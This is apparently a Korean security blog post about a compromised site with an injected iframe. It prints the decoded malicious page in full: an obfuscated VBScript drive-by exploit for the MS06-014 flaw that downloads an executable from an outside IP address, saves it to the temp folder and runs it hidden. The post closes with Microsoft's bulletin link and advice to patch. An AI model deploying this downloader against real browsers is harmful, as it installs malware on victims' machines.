iframe 이 삽입되었을 때 그 iframe 에 해당하는 주소도 이미 크래킹을 당했다고 보시면 됩니다.

예를들면 아래의 주소가 iframe 으로 삽입되어 있습니다.



요 녀석을 풀어보면 아래와 같습니다. MS06-014 취약점을 이용하는 것을 알 수가 있습니다.


<title></title>
<head></head>
<body>
<script language=“VBScript”>
on error resume next
var shasha="1111111111111111111111111111111111111111111111"
dl = "
http://218.****.140/setup.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
var_a1="Micr"
var_a2="osof"
var_a3="t.X"
var_a4="MLHTTP"

str=var_a1+var_a2+var_a3+var_a4
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="c:\winime.exe"
odf_a="Scri"
odf_a="ptin"
odf_a="g.Fi"
odf_a="leSystemObject"
odf_end=odf_a + odf_b+ odf_c+ odf_d
set F = df.createobject(odf_end,"")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
dfob_b1="She"
dfob_b2="ll.App"
dfob_b3="lic"
dfob_b4="ation"
dfall=dfob_b1+dfob_b2+dfob_b3+dfob_b4
set Q = df.createobject(dfall,"")
Q.ShellExecute fname1,"","","open",0
</script>
</body>
</html>


자자, MS06-014 취약점에 대한 마소사이트를 알려드리죠.
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx
영문입니다..허허허..

찾아보면 한글도 있을듯...

패치 잘하시고, 좋은 하루 되세요...